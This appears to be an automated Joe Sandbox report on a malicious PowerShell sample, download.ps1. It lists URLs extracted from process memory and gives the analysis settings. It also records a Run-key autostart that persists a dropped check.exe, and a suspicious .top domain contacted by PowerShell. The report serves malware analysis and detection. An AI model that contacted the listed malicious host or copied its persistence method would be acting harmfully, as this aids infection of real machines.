    https://github.com/giampaolo/psutil/issues/875.check.exe, 00000005.00000002.2152722468.000001DB08EA4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmpfalse
      http://repository.swisssign.com//check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmpfalse
        https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zipcheck.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmpfalse
          https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpfalse
            https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-filecheck.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmpfalse
              http://goo.gl/zeJZl.check.exe, 00000005.00000002.2128958771.000001DB08660000.00000004.00001000.00020000.00000000.sdmpfalse
                https://tools.ietf.org/html/rfc2388#section-4.4check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpfalse
                  https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpfalse
                    https://packaging.python.org/en/latest/specifications/entry-points/#file-formatcheck.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                      http://hkinuxb3bz.top/1.php?s=527powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        http://cacerts.digicheck.exe, 00000004.00000003.2208485892.0000028311F00000.00000004.00000020.00020000.00000000.sdmpfalse
                          https://peps.python.org/pep-0205/check.exe, 00000005.00000003.1840368079.000001DB079E2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1833669467.000001DB07581000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB079E2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105029843.000001DB07B00000.00000004.00001000.00020000.00000000.sdmpfalse
                            http://crl.dhimyotis.com/certignarootca.crlcheck.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                              http://curl.haxx.se/rfc/cookie_spec.htmlcheck.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmpfalse
                                http://ocsp.accv.escheck.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2086234964.000001BBCF081000.00000004.00000800.00020000.00000000.sdmpfalse
                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamecheck.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpfalse
                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxycheck.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmpfalse
                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1836530909.000001DB075A7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1837728642.000001DB0759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          https://httpbin.org/getcheck.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07D20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2128958771.000001DB08654000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codecheck.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      https://go.micropowershell.exe, 00000000.00000002.2086234964.000001BBD04D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        https://wwww.certigna.fr/autorites/0mcheck.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readercheck.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://github.com/python/cpython/issues/86361.check.exe, 00000005.00000003.1839009875.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840262827.000001DB07A20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1843045701.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840325932.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB079A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840368079.000001DB079A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839110774.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB07A1C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839088287.000001DB07A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              http://mail.python.org/pipermail/python-dev/2012-June/120787.html.check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                https://httpbin.org/check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://wwww.certigna.fr/autorites/check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulecheck.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachescheck.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        http://www.color.org)check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535check.exe, 00000005.00000002.2105400235.000001DB07EA2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sycheck.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadatacheck.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  http://crl.securetrust.com/STCA.crlcheck.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    http://wwwsearch.sf.net/):check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://github.com/python/importlib_metadata/wiki/Development-Methodologycheck.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          http://www.accv.es/legislacion_c.htmcheck.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              http://crl.xrampsecurity.com/XGCA.crl0check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  http://www.cert.fnmt.es/dpcs/check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://google.com/mailcheck.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://packaging.python.org/specifications/entry-points/check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        http://www.accv.es00check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://www.python.org/psf/license/)check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pycheck.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://mahler:8092/site-updates.pycheck.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://crl.securetrust.com/SGCA.crlcheck.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    http://.../back.jpegcheck.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      https://tools.ietf.org/html/rfc7231#section-4.3.6)check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844084262.000001DB07E1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://httpbin.org/postcheck.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://github.com/Ousret/charset_normalizercheck.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            http://www.firmaprofesional.com/cps0check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_speccheck.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/urllib3/urllib3/issues/2920check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  http://crl.securetrust.com/SGCA.crl0check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datacheck.exe, 00000005.00000002.2101666628.000001DB05A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://yahoo.com/check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        http://crl.securetrust.com/STCA.crl0check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6check.exe, 00000005.00000002.2105400235.000001DB07E6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://html.spec.whatwg.org/multipage/check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://www.quovadisglobal.com/cps0check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlcheck.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningscheck.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://www.rfc-editor.org/rfc/rfc8259#section-8.1check.exe, 00000005.00000002.2105400235.000001DB07EA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://requests.readthedocs.iocheck.exe, 00000005.00000002.2128958771.000001DB085A0000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://repository.swisssign.com/check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            http://repository.swisssign.com//ncheck.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://crl.xrampsecurity.com/XGCA.crlcheck.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://www.python.orgcheck.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://www.accv.es/legislacion_c.htm0Ucheck.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://www.aiim.org/pdfa/ns/id/check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                                                                                                                        http://ocsp.accv.es0check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.python.org/check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://json.orgcheck.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://docs.python.org/3/howto/mro.html.check.exe, 00000005.00000002.2103370262.000001DB077E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_packagecheck.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://twitter.com/check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://stackoverflow.com/questions/4457745#4457745.check.exe, 00000005.00000002.2152722468.000001DB08EA4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://www.cert.fnmt.es/dpcs/Vcheck.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://www.quovadisglobal.com/cpscheck.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB0801F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://google.com/check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://google.com/mail/check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://google.com/mail/check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://github.com/urllib3/urllib3/issues/32902check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://github.com/urllib3/urllib3/issues/3290check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://www.openssl.org/Hcheck.exe, 00000005.00000002.2173500044.00007FFBA1344000.00000002.00000001.01000000.0000001A.sdmp, check.exe, 00000005.00000002.2183903299.00007FFBA98D0000.00000002.00000001.01000000.0000001B.sdmpfalse
                                                                                                                                                                                                      http://crl.certigna.fr/certignarootca.crl01check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.2086234964.000001BBCF081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://peps.python.org/pep-0263/check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            104.20.22.46
                                                                                                                                                                                                            nodejs.orgUnited States
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                            Analysis ID:1571746
                                                                                                                                                                                                            Start date and time:2024-12-09 17:09:44 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 14m 9s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:37
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:download.ps1
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal68.spyw.evad.winPS1@39/433@1/1
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 75%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 62%
                                                                                                                                                                                                            • Number of executed functions: 47
                                                                                                                                                                                                            • Number of non-executed functions: 394
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .ps1
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.89.179.12, 172.202.163.200, 20.190.147.12, 13.107.246.63
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                            • VT rate limit hit for: download.ps1
                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            11:11:08API Interceptor46x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                            11:11:28API Interceptor3x Sleep call for process: check.exe modified
                                                                                                                                                                                                            11:11:31API Interceptor3x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                            11:11:49API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                            17:11:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            17:11:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.3622897092676909
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:+5IEi0PRjSjhI69SSim9r7kpZxQTWE2X7vKJS+r4xwn7KVw7wOVFOv1SnYzuiFpS:kIEpPRjSjsPwnmhRzuiFpY4lO80X
                                                                                                                                                                                                            MD5:7AC4384CE35BB13E211F42EEE1FED0EC
                                                                                                                                                                                                            SHA1:84B50582198292C1CAAAF3F68E0D20B02A4E5665
                                                                                                                                                                                                            SHA-256:00743777653F4C72A59D7110CE739799C1C9387085FE197BCACC453E0158E815
                                                                                                                                                                                                            SHA-512:30A4A7BCC84DFBDA104024FF19328691690B7EDB572D7DF94133D6874A37C027C28A5A2314B6334214B889334F8530228077498E4983A619BF90B8CF8FC5CAF1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
